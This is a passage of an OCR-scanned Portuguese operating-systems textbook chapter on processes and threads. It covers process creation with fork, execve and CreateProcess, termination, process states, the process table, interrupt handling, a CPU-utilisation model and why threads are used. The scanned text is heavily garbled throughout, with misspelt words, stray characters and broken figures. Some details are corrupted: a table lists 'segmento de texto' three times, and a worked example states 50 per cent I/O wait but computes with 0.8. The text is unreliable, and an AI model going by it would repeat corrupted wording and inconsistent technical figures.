onde ele estava na receita (o estado atual do processo e 
salvo), busca um livro de primeiros socorros e corneęa a 
seguir as instruęoes contidas neie. Nesse porno, vemos que 
o processador esta sendo altemado de um processo (assar o 
bolo) para um processo de prioridade mais alta (fornecer 
cuidados medicos), cada um cm um programa diferente 
(receita versm livro de primeiros socorros). Quando a pi- 
cada da abelha liver sido tratada, o ciernista voltara ao seu 
bolo, cominuando do ponto em que paroti. 

A kicia principal e que um processo consiitui uma ati- 
yidade. Ele possui programa, entrada, safda e um estado, 
Um unico processador pode ser compartiihado entre os 
varios processos, com algum algoritnio de e scalona men to 
u sad o para de lenni nar quando parar o irabalho sobre urn 
processo c servir outro. 

Convem notar quc, sc um programa esta sendo execu~ 
tado duas vezes, isso conta como dois processos. Por exem- 
pio, freąuentemente e possfvel iniciar um processador de 
texto duas ve7.es ou imprimir dois arquivos ao rnesmo tem¬ 
po se duas impressoras estivercm disponfveis. O fato dc 
que dois processos em execuęao estao opera udo o mesmo 


Um contador de programa 




(a) 


(b) 


£c) 


I Figura 2.1 (a) Multiprogramaęao de quatro próg ram as. (b) Modelo conceituał de quatno processos sequenciais indepen cienias¬ 
ie) Somente um programa esta ativo a cada momento. 
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programa nao importa; eles sao processos diferemes. O sis- 
tema operacional pode compartilhar o código entre des e, 
desse modo, apenas urna cópia esta na memória, mas esse 
e um detalhc tecnico quc nao a llera a situaęao conceitual 
dos dois processos sendo cxccutados. 

2-1.21 Criacao de processos 

Os sistemas operadonais precisam de mecamsmos para 
criar processos. Em sistemas mnito simples, ou em sistemas 
projetados para execmar apenas urna unica aplicaęao (por 
exemplo, o comrolador do Forno de micro-ondas), pode ser 
possfvel quc lodos os processos que sera o neccssarios sejam 
criados ąuando o sistema e liga do. Comudo, em sistemas 
de propósito geral e necessario algum mecanismo para 
criar e terminar processos durame a operaęao, ąuando for 
predso. Veremos agora alguns desses tópicos. 

Ha quatro eventos prmcipais que fazem com que pro¬ 
cessos sejam criados: 

1. Imdo do sistema. 

2. Execuęao de urna chamada de sistema de criaęao de 
processo por um processo em execuęao. 

3. Uma reąuisięao do usuario para criar urn novo pro¬ 
cesso, 

4. In ido de uma tarefa em lote (baichjob). 

Quando um sistema operadonal e carregado, em geral 
criam-se varios processos, Alguns deles sao processos em 
foreground (primeiro piano), ou seja, que interagem com 
usuarios (humanos) e realizam tarefaspara eles. Outros sao 
processos em background (segimdo piano), que nao estao 
assodados a usuarios em particular, mas que apresentam 
alg u ma funęao espedfica. For exemplo, um processo em 
background (segundo piano) pode ser designado a aceiur 
mensagens eletronicas sendo recebidas, ficando inaiivo na 
maior parte do dia r mas surgindo de repenie ąuando uma 
mensagem chcga. Outro processo cm background {segun¬ 
do piano) pode ser destinado a aceitar solidtaęoes que che- 
gam para paginas da Web liospedadas naquela maąuina, 
despertando ąuando uma reąuisięao chega pedindo o ser- 
vięo. Processos que ficam em background com a finalidade 
de lidar com alguma atividade como mensagem eletronica, 
paginas da Web, notidas, impressao, entre outros, sao cha- 
mados dc daemons. Ć comum os grand es sistemas lanęa- 
rem ma o dc dezenas deles. No UNIX, o programa ps pode 
ser usado para relacionar os processos que estao execuLan¬ 
do. No Windows, o gercnciador de larefas pode ser usado. 

Alem dos processos criados duranie a carga do sistema 
operacional novos processos podem ser criados depois dis- 
so* Muitas vezes, um. processo em execuęao fara chamadas 
de sistema [system calte) para criar um ou mais novos pro¬ 
cessos para ajudi-Io em sen trabalho. Criar novos processos 
e partiailarmente imeressante ąuando a tarefa a ser exe- 
aitada puder ser Facilmentc dividida em varios processos 
relacionados, mas interagindo de maneira independente. 
Por exemplo r sc uma grandę ąuamidade de dados cstiver 


sendo trazida via rede para que seja subsequentemente 
processada, po dera ser conveniente criar um processo para 
trazer esses dados e armazenados em um local comparti- 
Iliado da memória, enquamo um segimdo processo remove 
os dados c os proccssa. Em um sistema muIriprocessador, 
permitir que ca da processo cxccutc cm uma CPU diferente 
tambem torna o trabalho mais rap ido, 

Em sistemas interativos, os usuarios podem inicializar 
um programa digitando um comando ou clicando (duas 
vezes) um icone. Gada uma dessas aęoes inida um novo 
processo e cxecma nele o programa selecionado. Em sis- 
temas UNTX baseados em comandos que executam o X, o 
novo processo toina posse da janela na qual de foi dispara- 
do. No Microsoft Windows, ąuando um processo e disparado, 
ele nao tem Lima janela, mas pode criar uma (ou mais de 
uma), e a maioria deles cria. Nos dois sistemas, os usuarios 
podem ter multipias janelas abertas ao rnesmo tempo, cada 
uma executando algum processo, Usando o mouse, o usua¬ 
rio seledona uma janela c interage com o processo — por 
exemplo, fornecendo a cm rada quando for necessario. 

A liltima situaęao na qual processos sao criados aplica- 
-se somente a sistemas cm lote encontrados cm compu- 
tadores de grandę porte. Ncsscs sistemas, usuarios podem 
submeter (atć rcmotamentc) tarć fas em lote para o siste¬ 
ma. Quando julgar que tem recursos para exccutar outra 
tarefa, o sistema operacional criara um novo processo e 
execuiara nele a próxima tarefa da fila de entrada. 

Tecnicamente, cm todos esses ca sos, um novo processo 
(processo filho) e criado por um processo ex)stente (pro- 
cesso pa i) executando uma chamada de sistema para a crja- 
ęao de processo. Esse processo (processo pa i) pode ser um 
processo de usuario que esta execulando, um processo de 
sistema iiwocado a partir do tedado ou do mouse ou um 
processo gercnciador de lotos. O que o processo (pal) faz c 
cxecutar uma chamada de sistema para criar um novo pro¬ 
cesso (filho) c assim indica, direta ou indiretamente, qual 
programa exccutar nele. 

No UNIX, ha somente uma chamada de sistema para 
criar um novo processo: fork, Essa chamada cria um clone 
identico a o processo que a chamou- Depois da fork, os dois 
processos, o pa i e o filho, tem a mesma imageni de memó- 
ria, as mesmas variaveis de ambitnie e os mesmos arątii- 
vos abertos. E isso e tu do, Norma! menie, o processo filho 
executa, em seguida, execve ou Lima chamada de sistema 
similar para mudar sua imagem de memória e executar um 
novo programa. Por exemplo, ąuando urn usuario digiia 
um comando sort no interpretador de comandos, este se bi- 
furca gerando um processo filho, c o processo filho cxccuta 
o sort. A razao para esse processo de dois passos c permitir 
que o filho manlpule sens descritores de arquivos depois 
da fork, mas a mes da execve, para conseguir redirecionar a 
entrada-pa dra o, a safda-padrao e a saida de erros-padrao. 

Por outro lado, no Windows, uma unica chamada 
de funęao do Win32, CreateProcess, trata tanto do pro- 
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cesso de criaęao ąuanto da carga do programa correto 
no novo processo. Essa chamada possui dez parametros, 
incluindo o programa a ser executado, os parametros da 
linha de comando qne alimemam esse programa, va- 
rios atributos de seguranęa, os bits que controlam se os 
arquivos a beri os sao herdados, informaęao sobrc prio¬ 
ri dadc, urna esperificaęao da janela a ser criada para o 
processo (sc houver) c um pontdro para u ma estru tu- 
ra na qual a informaęao sobre o processo recem-criado 
e retornada para quem chamou. Alem do CreatePro- 
cess, o Win32 apresenia cerca de cem omras funęoes 
para gerenciar e sineronizar processos e tópicos afins. 

Tanio no UNIX quanto no Windows, depois quc um 
processo e criado, o pal e o ii lim Lem seus próprios espa- 
ęos de endereęnneiito dislintos. Se um dos dois processos 
a llera r urna palavra em scu espaęo de endereęamcmo, a 
mudanęa nao sera visfvel ao outro processo. No UNIX, 
o cspaęo dc endereęamenio imcial do fi!bo e urna cópia do 
espaęo de endereęamcmo do pal mas ha dois espaęos de 
endereęamcnto distintos envolvidos; ncnhmna memória 
para escriia e com partii ha da (algumas implementaęoes 
UNiX compartilham o código do programa enire os dois, ja 
quc nao podem ser altcradas). Contudo, e possivel que um 
processo recentemente criado compartilhe algom de seus 
recursos com o processo que o criou, como arquivos aber- 
tos, No Windows, os espaęos de endereęamento do pai e do 
filho sao diferemes dcsde o infcio. 

_ 2.1.31 Termino de processos 

Depois de criado, um processo comeęa a executar e faz 
seu irabalho. Com udo, nada I para sempre, nem mesmo os 
processos. Mais cedo ou mais Larde o novo processo termina- 
ra, norma 1 menie em razao de algiima das seguintes condięoes: 

1. Saida normaI (volunlaria} 4 

2. Sarda por erro (voIuntaria). 

3. Erro fatal (involuntario). 

4. Cancelarnenio por urn outro processo (itwolimtario). 

Na maioria das vezes, os processos terminam porąue 
fizeram seu Irabalho. Quando acaba de compilar o progra- 
nra atribmdo a ele, o eompilador exeaua urna chamada de 
sistema para dizcrao sistema opcracionat que ele icrminou. 
Essa chamada e a exit no U NIX e a BdtProcess no Windows. 
Programas baseados em tela tambem suportam o termino 
yoluntario. Proccssadorcs dc texto, visualizadorcs da Web 
(browsers) e programas similares sempre tern um icone ou 
um iłem de menu no qual o usuario pode cli car para dizer 
ao processo que remova quaisquer arquivos temporarios 
que de lenha a berto e, oma o, tmnine. 

O segundo motivo para termino e que o processo des- 
cobrc um erro latał. Por exemplo, se um usuario digiia o 
comando 

cc foo.c 


para compilar o programa foo.ee esse arquivo nao existe, 
o eompilador simplesmente termina a execuęao. Processos 
imerativos com base em tela gerahnente nao fecham quan- 
do parametros errados sao fornecidos. Em vez disso, urna 
caixa dc dlalogo emerge c pergunta ao usuario sc de qucr 
tentar nova menie. 

A terceira razao para o termino e um erro causado pelo 
processo, muilas vezes por um erro de programa. Entre os 
yarios exempłos estao a execuęao de urna instmęao i legał, 
a referenda a memória inexistente ou a divisao por zero. 
Em algiins sistemas (por exemplo, UNLX), um processo pode 
dizer ao sistema operarional que deseja, cle mesmo, tralar 
ccrios erros. Ncssc caso, o processo ć sinalizado (interronipi- 
do) em vcz de finalizado pcla ocorrencia de erros. 

A ąuaria razao pela qual um processo pode terminar se 
da ąuando um processo exeaiia urna chamada de sistema di- 
zendo ao sistema operadonal para cancelar algutn outro pro¬ 
cesso. No UNIX, essa chamada e a kil], Afunęao Win32 corres- 
pondente e a TerminateProcess. Em ambos os ca sos, o processo 
que forefetuarocancelamento deve tera autorizaęao neces- 
śaria para faze-la Em alguns sistemas, ąuando um processo 
termina, vohintariameme ou nao, todos os processos cria- 
dos por de tambem sao imediaiameme cancelados. Cornu- 
do, nem o UNJX nem o Windows funcionam dessa maneira. 

2.1.41 Hierarquia$ de processos 

Em alguns sistemas, ąuando um processo eria outro, 
o processo pai e o processo filho continuam, de certa ma- 
neira, associados. O próprio processo filho pode gerar mais 
processos, formando urna hierarąuia dc processos. Observe 
que isso e diferente do que ocorre com plantase animais, que 
utilizam a reproduęao sexuada, pois um processo tern ape- 
nas um pai (maspode ter nenhum, um, dois 011 maisfilhos). 

No UNIX, um processo, todos os seus filhos e descen- 
dentes formatu um grupo de processos. Quando um usua- 
rio envia um sinal do teclado, o sina! e entregue a todos os 
membros do grupo dc processos associado com o teclado 
(normahnente todos os processos ativos que foram criados 
na janela atual). Individualmente, cada processo pode cap- 
turar o sinal ignora-lo 011 toiuar a aęao predefinida, isio c, 
ser finalizado pelo sinal, 

Outro exemplo da atuaęao dessa hierarquia pode ser 
observado no infcio do UNiX, ąuando o computador e li- 
gado. Um processo especial, chamado mit, esta presente na 
imagem de carga do sistema. Quando conieęa a executar, 
ele le um arquivo dizendo ąuantos tenuinais existem. En- 
tao dc se bifurca varias vezcs para ter 11111 novo processo 
para cada terminal Esses processos esperam por alguma 
conexao de usuario, Se algutn usuario sc conectar, o pro¬ 
cesso de conexao executara um interpretador de coman- 
dos para aceitar comandos dos usuarios, Esses eomandos 
podem iniriar mais processos, e assim por dianie. Desse 
modo, todos os processos em todo o sistema perlencem a 
urna unica arvore, com o hut na raiz. 
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Por outro lado, o Windows na o apresenta nenhmn 
conceito de hierarąuia de processos. Todos os processos 
sao iguais. Algo parecido com urna hierarąuia de proces¬ 
sos ocorrc somente ąuondo um processo e criado. Ao pal e 
dadotnn idcmificador cspcdal (chamado handle), que dc 
pode usar para controlar o filho* Contudo, dc ć livrc para 
passar esse identifieador para alguns outros processos, in- 
validando, assim, a hierarąuia Os processos no UNIX na o 
podem desęrdar seus fillios, 

2-1-51 Estados de processos 

Embora cada processo seja uma cniidadc independen- 
com scu próprio contador de programa e es la do interno, 
mnilas vc?es os processos precisam interagir com outros. 
Ufn processo pode gerar uma saida que outro processo usa 
como entrada, No imerpretador de comandos, 

cat chapterl chapter2 chapter3 | grep tree 

o primeiro processo, que executa cat r gera como salda a 
concaienaęao dos tres arqinvos. O segundo processo, que 
exeaiia tfrep, seleciona todas as linlias comendo a palavra 
Uree'. Dependendo das velocidades relativas dos dois pro¬ 
cessos (atreladas tamo a complexidade relativa dos progra- 
mas ąuanto a o tempo dc CPU que cada um deteve), pode 
ocorrcr que o $ rep esteja pronto para executar, mas nao 
baja entrada para cle, Ek dcvc, entao, bloąucar atć que 
alguma entrada esteja dispomvel. 

Um processo bloqueia porque oln iamente na o pode 
prosseguir — cm geral porąue esta esperando por uma 
entrada ainda nao disponfrel. Ś possivel tambem que 
um processo conceitualmente pronto e ca pa z de execu- 
tar esteja bloąueado porąue o sistema operadonal dcci- 
di u alocar a CPU para outro processo por algum tempo. 
Essas duas condięoes sao complctamente diferentes. No 
primeiro caso, a suspensao e ineremc ao problema (nao 
se pode processar a linha de comando do usuario cn- 
ąuanto dc nao digitar nada). O segundo ć uma tccni- 
calidade do sistema (nao ha CPUs sufidentes para dar a 
cada processo um proccssador cxclusivo). Na Figura 2.2, 
podemos ver um diagram a de estados moslrando os ires 
estados de um processo: 

\. Em exccuęao (realnienie tisando a CPU naąuele 
mstante). 

2. Pronto (executavd; lemporariamcnte parado para 
dar lugar a outro processo). 

3. Bloąueado (incapaz de executar enąuamo nao 
ocorrer um evenio externo). 

Logicamente, os dois primeiros estados sao similares. 
Em ambos os casos o processo vai cx ecu tar, só quc no se¬ 
gundo nao ha, tempera riamente, CPU disponivd para cle. 
O terceiro estado e diferente dos dois primeiros, pois o 
processo nao pode exccular, mesmo que a CPU nao km ha 
nada para fazer. 



1,0 processo bloąueia aguardando uma entrada 
2.0 escalonador seleciona outro processo 
3,0 escalonador seleciona esse processo 

4. A entrada torna-se disponivel 

I Figura 2,2 Um processo pode estar nos estados em 
execuęao, bloąueado ou pronto. As transięoes entre esses 
estados sao mostradas. 

Quatro transięoes sao possfveis entre esses tres estados, 
conforme se ve na figura. A transięao I ocorrc quando o 
sistema operadonal descobrc que um processo nao pode 
prosseguir, Em alguns sistemas, o processo prccisa execu- 
tar uma chamada dc sistema, como pause, para entrar no 
estado bloąueado, Em outros sistemas, indusivc no UNIX, 
ąuando um processo 16 de um pipę ou de um arquivo espe- 
cial (por exemplo, um terminal) e nao ha entrada disponf- 
vd r o processo e automaticamente bloąueado. 

As transięoes 2 e 3 sao causa das pelo escalonador de 
processos — inna parte do sistema operadonal —, seni que 
o processo saiba disso. A transięao 2 ocorrc ąuando o esca¬ 
lonador dccide que o processo cm exccuęao ja tcve tempo 
sufidente de CPU e e momento de deixar outro processo 
ocupar o tempo da CPU, A transięao 3 ocorrc ąuando in¬ 
dos os outros processos ja compartilharam a CPU, de uma 
maneira justa, e e liora de o primeiro processo obter nova- 
menie a CPU. O escalonamento — isto e, a decisao sobre 
ąuando e por ąuanto tempo cada processo deve executar — 
e um tópico muito importame e sera esmdado depois, nes- 
te mesmo capitulo. Muitos algoritmos vem sendo deseń- 
volvidos na tentativa de eąuilibrar cssa competięao, que 
cxige eficicncia para o sistema como um todo c iguaidade 
para os processos individuais. Estudarcmos alguns deks 
neste capitulo. 

A transięao 4 ocorre ąuando acontece um evento ex- 
terno pelo qual urn processo estava aguardando (como a 
chegada de alguma entrada). Se nenhum outro processo 
estivcr executando naąuele momento, a transięao 3 sera 
disparada e o processo comeęara a exccutar. Caso contra¬ 
no, cle podera ter dc aguardar em estado dc pronto por um 
peąueno intemlo de tempo, ate que a CPU esteja dispom- 
vd e cliegue sua vez. 

Com o modelo de processo, toma-se muito mais facil 
saber o ąue esta ocorrendo dentro do sistema. Alguns dos 
processos cha mam programas que cxccutam comandos di- 
gitados por um usuario. Outros processos sao parte do sis¬ 
tema c manejam tarefas como fazer i cąuisięoes por sen i- 
ęos de arquivos ou gerenciar os detalhes do funcionairtenlo 
de um acionador de disco ou lita, Quando ocorre uma 
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interrupęiio de disco, o sistema toina a dedsao de parar de 
executar o processo corrente e retomar o processo do disco 
que foi bioqueado para aguardar essa imerrupęao. Assim, 
em vcz de pensar em interrupęoes, podemos pensar em 
proccssos dc usuario, de disco, dc tcrniinais on oulros, que 
bloąuciam ąuando cstao a espera de quc algo acontcęa. 
Finalizada a Idtura do disco on a digitaęao dc um caracterc, 
o processo quc aguarda por isso e desbloąueado c toma-sc 
disponfrd para execmar nouamente, 

Essa visao da origem ao modclo mo sir a do na Figura 
2.3, Nele, o nivd mais baixo do sistema operadonal c o 
escalonador, com diversos proccssos adma dcle. Todo o tra- 
tamento dc interrupęao c dctallies sobrc a inidalizaęao e o 
bloąucto dc proccssos cstao ocultos naquilo qne ć chama do 
aqui dc cscalonador, que, na verdade, nao tern niuito eó- 
digo. O restante do sistema operadonal e bem estru tura do 
na forma de proccssos, Comudo, poucos sistemas reais sao 
tao bem estruturados como esse, 

2.1.6] Implementacjo de processos 

Para implementar o modclo de processos, o sistema 
operadonal mantem urna tabela (um arranjo de estru tu- 
ras) cha mada de tabela de processos, com urna crurada 
para cada processo. (Alguns a mores cha mam essas entra- 
das dc process control bjocks — blocos dc controle de 
processo.) Essa emrada coniem informaęoes sobre o estado 
do processo, seu contador dc programa, o ponteiro da pl- 
Iha, a alocaęao dc memória, os estados de seus arquivos 
abertos, sua informacjo sobre coniabilidadc c escalona- 
mento e tudo o mais sobre o processo quc (kva ser sa!vo 
ąuando o processo passar do estado em exmięao para o es- 


Processos 


0 

1 

• # * 

n -2 

n- 1 

Escalonador 


I Figura 2,3 O nivei mais baixo de um sistema operadonal 
estruturado em processos controla interrupęoes e 
escalonamento. Adma desse nfvel estao processos sequendais. 

rado pronto on bloąuwdo, para que eie possa ser reiniciado 
depois, como se rum ca tivesse sido bloąueado. 

A Tabela 2.1 inostra alguns dos campus mais impor- 
tantes dc um sistema tfpico. Os campos na primcira coluna 
rclacionam-sc com o gerenciamento do processo, As out ras 
duas colunas sao relativas ao gerenciamento dc memória e 
ao gerenciamento de arquivos, respectivamcnte. Devc-sc 
observar que a exatidao dos campos da tabela de proccs¬ 
sos c aliamcnte dependeme do sistema, mas essa figura da 
u ma kicia geral dos tipos necessarios de informaęao. 

Agora que vimos a tabela dc proccssos, 6 possfvcl ex- 
plicar um pouco mais sobrc como c mantida a ilusao de 
multipfos processos sequenciais, cm uma maąuina com 
uma (on cada) C PU e mu i los dispositivos de E/S. Associada 
a cada dasse de dispositivos de E/S (por exemplo, discos 
flexfvds ou rigidos, tempori zador es, termlnais) esii uma 
parte da memória (geraimeme próxima da parte mais baixa 
da memória), cliamada de arranjo de interrupęoes. Esse 
arranjo contem os endereęos das rotinas dos servięos de 
interrupęao, Suponha que o processo do usuario 3 esteja 


Gerenciamento de processo 

Gerenciamento de memória 

Gerenciamento de arqutvo 

Registros 

Contador de programa 

Palavra de estado do programa 

Ponteiro da pitha 

Estado do processo 

Prioridade 

Parśmeiros de escalonamento 

ID do processo 

Processo pat 

Grupo de processo 

SEnais 

Momento em que um processo foi iniciado 
Tempo de CPU usado 

Tempo de CPU do processo filho 

Tempo do alanne seguinte 

Ponteiro para informaęoes sobre o segmento 
de texto 

Ponteiro para informaęoes sobre o segmento 
de texto 

Ponteiro para informaęoes sobre o segmento 
de texto 

Diretório-raiz 

Diretório de trabaiho 

Descritores de arquivo 

!D do usuario 

ID do grupo 


1 Tabela 2.1 Alguns dos campos de um processo tipico de entrada na tabela. 
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executando quando ocorre uma interrupęao de disco. O 
contador de programa do processo do usuario 3, palavra 
de status do programa e, possivelmente, um on mais re¬ 
gistradores sao colocados na pilha (a ma i) pdo hardware 
dc interrupęao. O compufador, cntdo, desvia a execuęao 
para o cndcrcęo cspccificado no arranjo dc interrupęoes. 
Isso e tu do o quc hardware faz. Da li cm dianie, e papci do 
software, cm part kula r, fazer a rodna de servięo da inter¬ 
rupęao pmssegutr. 

Todas as interrupęoes comcęam salvando os registra¬ 
dores, muitas vezes na entrada da tabela dc processos re- 
fereiite ao processo eorrente. Entao a informaęao coiocada 
na pilha pcla interrupęao ć rcmovida c o ponteiro da pi¬ 
lha ć alterado para que aponte para uma pilha temporaria 
usada pclo manipulador dos processos (process handler). 
Aędes como salvar os registradores e alterar o ponteiro de 
pilha nao padem ser expressas em linguagens de a ho mvel 
como C. Assim, elas sao implementadas por uma peąuena 
rotina em linguagein assembly (iinguagem dc montagem). 
Normalmenie e a mesma rotina para todas as interrupęoes, 
ja que o trabalho de sahar os registradores e identico, nao 
importando o que causou a interrupęao. 

Quando termina, a rotina assembly chama uma rotina 
em C para fazer o restante do trabalho desse lipo espetffi- 
co de intermpęao. (Yamos supor que o sistema operacional 
esteja escrito em C, a escolha usual para todos os sistemas 
opera don ais reais.) Quando essa tarefa acaba, possivelmen- 
te colocando algum processo em estado de prontoę o esca- 
lonador e chamado para vcrificar qual e o próximo processo 
a cxccutar. Dcpois disso, o controle c passa do de volto para 
o código cm Iinguagem assembly para carregar os regis¬ 
tradores e o mapa dc memória do novo processo corrcn- 
te e inicializar sua execttęao + 0 tratamento de interrupęao 
e o escalonamento sao resumidos na Tabela 22. Coiwem 
observar que os detalhes variam de sistema para sistema. 

1. 0 hardware errplha o contador de programa etc. 

2. O hardware cairega o novo contador de programa a partir 
do arranjo de interrupęoes, 

3. O procedrmento em Iinguagem de montagem salva os 
registradores. 

4. O procedimento em Iinguagem de montagem eon figura 
uma nova pilha. 

5. 0 semęo de interrupęao em C exeeuta (em geral \% e 
armazena temporariamente a entrada). 

6. 0 escalonador decide qual processo e o prórimo a 
executar. 

7. O procedtmento em C retorna para o código em 
Iinguagem de montagem. 

8. 0 procedtmento em Iinguagem de montagem inicta o 
novo processo atual. 

I Ta be la 2.2 O esgueleto do que o nive! mais baixo do sistema 
operacional faz guando ocorre uma interrupęśto. 


Quando o processo temiina, o sistema operacional exibe 
um caractere de prompt (prontidao) e espera um novo co- 
mando. Quando recebe o comando P carrcga um novo pro- 
grama na memória, sobrescrcvendo o primeiro. 

2,1.7 I Modelarnio a multiprogramaęao 

Quando a multiprogramaęao e usada, a ulilizaęao da 
CPU pode ser aumemada. Dc modo gerat, sc o processo 
medio computa apenas durante 20 por cento do tempo cm 
que esta na memória, com cinco processos na memória a 
ca da vez, a CPU deveria estar ocupada o tempo Lodo. Esse 
modela ć oiunista e pouco realista, entretamo, uma vcz 
que supoe tacitamenie que nenhum dos cinco processos 
estara esperando por dispo$ilivo$ de E/S ao mesmo tempo. 

Um modelo mci hor e examinar o emprego da CPU 
do porno de vista probabiiistico. Imagine que um processo 
passe unia fraęao p dc seu tempo esperando que os dispo- 
silivos de E/S sejam condindos. Com ;; processos na me¬ 
mória simultaneamenie, a próbabilidade dc que todos os n 
processos estejam esperando por dispositivos de E/S (caso 
no qual a CPU estaria ociosa) e p\ A utilizaęao da CPU e, 
porbnio, da da pda formula 

ulilizaęao da CPU = 1 -p" 

A Figura 2.4 mostra a ulilizaęao da CPU como funęao 
de ti , que e chamada de grau de multiprogramaęao. 

Dc acordo com a figura, iica claro que, sc os processos 
passam 80 por ccnto dc seu tempo esperando por dispositi- 
vos de E/Ś, pdo rnenos dez processos devem estar na me¬ 
mória simultaneameme para qtie a CPU desperdice menos 
de 10 por cento. Se voce ja notou que um processo intera- 
tivo esperando que um usuario digite algo em um terminal 
esta em estado de espera de E/S ( entao deveria ficar claro 
que tempos de espera de E/S de 80 por cento ou mais nao 
sao incomuns. Mas, mesmo nos servidores, os processos 
executando muitas opcraęoes de E/S em discos muitas ve- 
zes terao porccnlagcm igual ou superior a essa. 

Para garamir exatidao complęta, deve-se assinalar que 
o modelo probabiiistico descrito e apenas uma apraxima- 



Figura 2.4 Utilizaęao ba CPU como funęao do numoro ds 
processos na memória. 
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ęao. l£le supoe imphcitamente que todos os processos n sao 
independentes, o que sigtiifka qite e bastante aceitavel que 
urn sistema com rinco processos em memória tenlia tres 
sendo execiuados e dois espcrando. Mas, com urna linica 
CPU, nao podcmos ter tres processos sen do executados ao 
mesmo tempo, dc forma quc um proccsso quc foi para o 
estado 'pronto 1 enquanto a CPU esta ocupada tera dc espe- 
rar, Desse modo, os processos nao sao independentes, Um 
niodelo mais preciso pode ser consmudo utilizando a teoria 
das filas, mas o nosso argumemo — a multiprogramaęao 
permite que os processos Lisem a CPU quando, em outras 
ciromstancias, ela se tornaria ociosa — ainda e, naturah 
menie, valido, mesmo que as curvas verdadeiras da Figura 
2.4 sejam ligeiramente diEerentes das mostradas na figura. 

Hm bora muito simples, o model o da Figura 2 A pode, 
mesmo assim, ser usado para previsoe$ espeeificas, ainda 
que aproximadas, de desempenho da CPU. Suponha, por 
exemp1o, que um computador tenha 512 MB de memó¬ 
ria, com um sistema operacional que use 128 MB, e que 
cada programa de usuario tambem empregue 128 MB. Es- 
ses tamanhos possibilitam que tres programas de usuario 
estejam simultaiieamente na memória. Considerando-se 
quc, em media, um proccsso passa 50 por cento dc seu 
tempo cm espera por E/S, tem-se urna utilizaęao da CPU 
(ignorando o gasło cxlra — ovcrhead — ca usado pclo sis¬ 
tema operacional) dc 1 -0,8*, on cerca de 49 por cento. A 
adięao de mais 512 MB de memória permite que o sistema 
a u menie seu gran de multiprogramaęao de 3 para 7, ele- 
vando assim a utilizaęao da CPU para 79 por cento. Em 
outras palavras, a adięao de 512 MB aumentara a utilizaęao 
da CPU em 30 por cento. 

Adidonando ainda outros 512 MB, a utilizaęao da CPU 
aumcnla apenas de 79 poi cento para 91 por cento, ele- 
vando, dessa forma, a utilizaęao da CPU em apenas 12 por 
cento. Esse modelo permite que o dono de um computador 
decida que a primeira adięao de memória e um bom inves- 
timemo, mas nao a segunda. 

Threads 

Em sistemas operadonais trąd ici on ais, cada processo 
tern um espaęo de endereęamento e um unico thread de 
controle. Na verdade r isso e quase unia definięao de pro¬ 
cesso. Coimido, frequentemente ha situaęóes cm que e de- 
sejavel ter miiltiplos threads de controle no mesmo espaęo 
de endereęamento exccutando em qu a se-paralelo, como 
se des fossem processos separados (exceto pelo espaęo de 
endereęamento compartilhado). Nas scęóesa seguir, discu- 
lircmos essas situaęóes e suas implicaęoes. 

2.2.11 o uso de thread 

Por que alguem desejaria ter um lipo de processo den- 
tro de um processo? Constata-se que ha varias razóes para 
exi.stirem esses min [proces sos, chamados threads. Exami- 


nemos alguns deles agora. A principal razao para existirem 
threads e que em muitas aplicaęoes ocorrem mulliplas ati- 
vidades ao mesmo tempo. Algumas dessas atividades po- 
dem ser bloąueadas de tempos em temp os. O modelo dc 
programaęao se torna mais simples se decompomos urna 
aplicaęao em miiltiplos threads scqucndais quc cxcctitam 
cm ąuase paralelo, 

Ja vimos esse argumemo a mes. Ś precisamente o mes¬ 
mo argumemo para a existencia dos processos, Em vcz dc 
pensarmos em interrupęoes, temporizadores e chavcamen- 
to de comcxtos, podcmos pensar em processos paralelos. 
Só que agora, com os threads, adidonamos um novo e!e- 
meruo: a capaddade de entidades paralela* compartilha- 
rem de um espaęo de endereęamento e todos os seus dados 
entre clas nicsmas. Isso e cssendal para cert as aplicaęoes, 
nas quais miiltiplos processos (com seus espaęos de ende¬ 
reęamento separados) nao fundonarao. 

Um segundo argument o para a exislenda dc threads 
e que eles sao mais faceis fisto e, mais rapidos) de criar e 
destruir que os processos, pois nao tern quaisquer recursos 
associados a eles. Em muito* sistemas, criar um thread e 
ecm vezes mais rapido do que criar urn proccsso. £ tiiil ter 
essa propriedade quando o nu mero dc threads neccssarios 
se altcra dinamica c rapidamente. 

Urna teroeim razao e tambem um argumentu de desem¬ 
penho. O uso de threads nao resulia emganho de desempenho 
quando todos eles sao CPU-bo u nd (limitados pela CPU, isto e, 
muito processamenio com po u ca E/S). No entanto, ąuando 
ha grandę quantidade de compulaęao e de E/S, os threads per- 
mitem quc essas atividades se sobreponham c, desse modo, 
a cele nim a aplicaęao. 

Finalmente, os threads sao utcis em sistemas com miil- 
tiplas CPUs, para os quais o paralelismo real e possiveh Vol- 
taremos a esse assunto no Capimi o 8. 

A mancira mais facil de perccber a ulilidadc dos threads 
e apresentar cxcmplos concretos. Como um primciro exem- 
plo, considere um processador de textos. A maioria dos pro- 
cessadorcs de texto mostra o documento em criaęao na tela, 
forma lado exatamcntc como cle aparecera cm uma pagina 
impressa. Mais cspccificamentc, todas as qucbras dc lin ha c 
de pagina csfao na posięao correta e finał para que o usua¬ 
rio possa confcri-las e altcrar o documento, se for necessa- 
rio (por cxemplo r climinar linhas viuvas e órfas — linhas 
incompletas no imcio e no finał de uma pagina, que sao 
consideradas esteticamente desagradavds). 

Suponha que o usuario esteja escrevendo um liwo. Do 
ponto de vista do autor, e mais facil manier o livro intei- 
ro como urn arquivo unico para tomar mais facil a busca 
por tópicos, realizar substUuięoes gerais e assim por dianie. 
Mas ha a alt orna li va de cada cap Aulo consiituir um arqui- 
vo sępa rado. Contudo, ter cada seęao e subseęao como um 
arquivo sępa rado constitui um serio problema quando e 
nccessario fazer alteraęóes globais em todo o livro, ja que, 
para isso, centenas de arquivos deverao ser ediiados indi- 
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vidualmente. Por exemplo, se urn padrao proposto xxxx e 
aprovado um pouco antes de o livro seguir para impressao, 
todas as ocorrendas de "Padrao Provisório xxxx" devem 
ser alieradas para "Padrao xxxx" no ultimo minuto. Se o 
livro imciro cstivcr cm urn arquivo, cm geral um unico co- 
mando podcra fazcr todas as substituięoes, Por outro lado, 
sc o livro cstivcr dividido cm 300 arquivos, cada um dclcs 
devcra ser edilado sępa rad a men te, 

Agora, imagine o que acontece ąuando o usuario remo- 
ve, de repem e, unia sentenęa da pagina 1 de um documento 
de S00 paginas. Dcpois de verificar a pagina alterada para se 
assegurar de quc esta corrcta on nao, o usuario agora qucr 
fazcr outra mudanęa na pagina 600 e digita um comando 
dizendo para o processador dc icxtos ii ale aquda pagina 
{possivclniente buscando uma frase quc apareęa somente 
la). O processador de textos e, eniao, foręado a leformatar 
